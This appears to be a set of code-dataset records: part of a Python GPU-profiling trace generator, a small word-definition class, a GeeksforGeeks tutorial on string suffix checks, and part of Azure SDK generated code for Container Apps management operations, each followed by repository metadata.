"gpuPerTrainer": self._gpuPerTrainer,
"minTimeStamp": self._minTimeStamp,
"organizeForm": FILEORGANIZEFORM_BYRANK,
}
self._dcgmFileReader = dcgmFileReader(
self._logger, self._dcgmFileReaderArgs
)
self._profileFileReader = profileFileReader(
self._logger, self._profileFileReaderArgs
)
def _init_timeInfo(self):
self._timePath = os.path.join(self._workPath, TIME_PATH)
self._timeInfo = {}
self._minTimeStamp = 0
self._set_timeInfo()
def _set_timeInfo(self, timeFileNamePrefix="time.txt", sed="."):
timeFileNameList = glob.glob(
os.path.join(self._timePath, timeFileNamePrefix, sed, "*")
)
for timeFileName in timeFileNameList:
trainerId = int(timeFileName.split(sed)[-1])
gpuId = int(timeFileName.split(sed)[-2])
info = {}
with open(timeFileName, "r") as rf:
for line in rf:
if line.startswith("start time:"):
info["start_time"] = int(
float(line.split(":")[-1]) * 1e9
)
self._minTimeStamp = min(
self._minTimeStamp, info["start_time"]
)
if line.startswith("end time:"):
info["end_time"] = int(float(line.split(":")[-1]) * 1e9)
if not info:
self._timeInfo[gpuId * trainerId] = info
def _generateTraceFileByGroupAndGpuId(
self, pipileInfo, netInfo, groupId, gpuId
):
dcgmInfoDict = self._dcgmFileReader.getDcgmInfoDict(groupId, gpuId)
opInfoDict = self._profileFileReader.getOpInfoDict(groupId, gpuId)
traceObj = {}
traceObj["traceEvents"] = (
pipileInfo[str(gpuId)]
+ opInfoDict["traceEvents"]
+ dcgmInfoDict["traceEvents"]
+ netInfo["traceEvents"]
)
self._profileFileReader.dumpDict(
traceObj, "traceFile", groupId, gpuId, False, self._saveFilePath
)
def _generateTraceFileByGroup(self, groupId, processNum):
# first we need to generate pipeline info
pipileInfo = self._profileFileReader.getPipeLineInfo(
groupId, processNum
)
# second we need to generate dcgm info
dcgmInfo = self._dcgmFileReader.getDCGMTraceInfo(groupId, processNum)
# third we need to generate net info
netInfo = {}
netInfo["traceEvents"] = []
# netInfo = self._netFileReader.parseFileByGroup(groupId, processNum)
# forth we need to generate op info
opInfo = self._profileFileReader.getOPTraceInfo(groupId)
# finally we need dump this information into disk
processPool = []
pidList = []
for gpuId in range(self._gpuPerTrainer):
subproc = Process(
target=self._generateTraceFileByGroupAndGpuId,
args=(
pipileInfo,
netInfo,
groupId,
gpuId,
),
)
processPool.append(subproc)
subproc.start()
pidList.append(subproc.pid)
self._logger.info(
"[traceFile]: process [%d] has been started, total task num is %d ..."
% (subproc.pid, 1)
)
for t in processPool:
t.join()
pidList.remove(t.pid)
self._logger.info(
"[traceFile]: process [%d] has exited! remained %d process!"
% (t.pid, len(pidList))
)
def generateTraceFile(self, processNum=8):
processPool = []
pidList = []
for groupId in range(self._trainerNum / self._groupSize):
subproc = Process(
target=self._generateTraceFileByGroup,
args=(
groupId,
processNum,
),
)
processPool.append(subproc)
subproc.start()
pidList.append(subproc.pid)
self._logger.info(
"[GroupTraceFile]: process [%d] has been started, total task num is %d ..."
% (subproc.pid, 1)
)
for t in processPool:
t.join()
pidList.remove(t.pid)
self._logger.info(
"[GroupTraceFile]: process [%d] has exited! remained %d process!"
% (t.pid, len(pidList))
)
if __name__ == '__main__':
args = get_argparse()
tl = CspReporter(args)
tl.generateTraceFile()
| [
"[email protected]"
] | |
3f89fb97ec5363fc81efe42ce4a627e34436e809 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_suite.py | 5d9059953940881ade58e572a6b7dde68f38bcfb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py |
#calss header
class _SUITE():
def __init__(self,):
self.name = "SUITE"
self.definitions = [u'a set of connected rooms, especially in a hotel: ', u'a set of furniture for one room, of matching design and colour: ', u'a piece of music with several parts, usually all in the same key', u'a set of related software (= computer program) products']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
1bdd34e88fd6277b360b09b84201d96e1a50fe44 | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/python_all/143_15.py | 8d67528a49ea0ab7b49f24cfcb96309e98a02750 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | Python | Check if string ends with any string in given list
While working with strings, their prefixes and suffix play an important role
in making any decision. For data manipulation tasks, we may need to sometimes,
check if a string ends with any of the matching strings. Let’s discuss certain
ways in which this task can be performed.
**Method #1 : Usingfilter() + endswith()**
The combination of the above function can help to perform this particular
task. The filter method is used to check for each word and endswith method
tests for the suffix logic at target list.
__
__
__
__
__
__
__
# Python3 code to demonstrate
# Checking for string match suffix
# using filter() + endswith()
# initializing string
test_string = "GfG is best"
# initializing suffix list
suff_list = ['best', 'iss', 'good']
# printing original string
print("The original string : " + str(test_string))
# using filter() + endswith()
# Checking for string match suffix
res = list(filter(test_string.endswith, suff_list)) != []
# print result
print("Does string end with any suffix list sublist ? : " +
str(res))
---
__
__
**Output :**
The original string : GfG is best
Does string end with any suffix list sublist ? : True
**Method #2 : Usingendswith()**
As an improvement to the above method, it is not always necessary to include
filter method for comparison. This task can be handled solely by supplying a
suffix check list as an argument to endswith method as well.
__
__
__
__
__
__
__
# Python3 code to demonstrate
# Checking for string match suffix
# using endswith()
# initializing string
test_string = "GfG is best"
# initializing suffix list
suff_list = ['best', 'iss', 'good']
# printing original string
print("The original string : " + str(test_string))
# using endswith()
# Checking for string match suffix
res = test_string.endswith(tuple(suff_list))
# print result
print("Does string end with any suffix list sublist ? : " +
str(res))
---
__
__
**Output :**
The original string : GfG is best
Does string end with any suffix list sublist ? : True
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"[email protected]"
] | |
f4b33a1d107c661005411ee377782495662a53f5 | d7016f69993570a1c55974582cda899ff70907ec | /sdk/appcontainers/azure-mgmt-appcontainers/azure/mgmt/appcontainers/operations/_container_apps_operations.py | 57696edccfe1612b68eccd942bdcaf4fd0b1173b | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 62,915 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_by_subscription_request(subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/providers/Microsoft.App/containerApps")
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_by_resource_group_request(resource_group_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_update_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PATCH", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_custom_host_name_analysis_request(
resource_group_name: str,
container_app_name: str,
subscription_id: str,
*,
custom_hostname: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listCustomHostNameAnalysis",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
if custom_hostname is not None:
_params["customHostname"] = _SERIALIZER.query("custom_hostname", custom_hostname, "str")
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_secrets_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listSecrets",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_auth_token_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/getAuthtoken",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class ContainerAppsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.appcontainers.ContainerAppsAPIClient`'s
:attr:`container_apps` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_by_subscription(self, **kwargs: Any) -> Iterable["_models.ContainerApp"]:
"""Get the Container Apps in a given subscription.
Get the Container Apps in a given subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ContainerApp or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerAppCollection] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_subscription.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ContainerAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_by_subscription.metadata = {"url": "/subscriptions/{subscriptionId}/providers/Microsoft.App/containerApps"}
@distributed_trace
def list_by_resource_group(self, resource_group_name: str, **kwargs: Any) -> Iterable["_models.ContainerApp"]:
"""Get the Container Apps in a given resource group.
Get the Container Apps in a given resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ContainerApp or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerAppCollection] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_resource_group.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ContainerAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_by_resource_group.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps"
}
@distributed_trace
def get(self, resource_group_name: str, container_app_name: str, **kwargs: Any) -> _models.ContainerApp:
"""Get the properties of a Container App.
Get the properties of a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ContainerApp or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.ContainerApp
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
404: lambda response: ResourceNotFoundError(response=response, error_format=ARMErrorFormat),
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
def _create_or_update_initial(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> _models.ContainerApp:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(container_app_envelope, (IO, bytes)):
_content = container_app_envelope
else:
_json = self._serialize.body(container_app_envelope, "ContainerApp")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("ContainerApp", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@overload
def begin_create_or_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: _models.ContainerApp,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Create or update a Container App.
Create or update a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties used to create a container app. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def begin_create_or_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Create or update a Container App.
Create or update a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
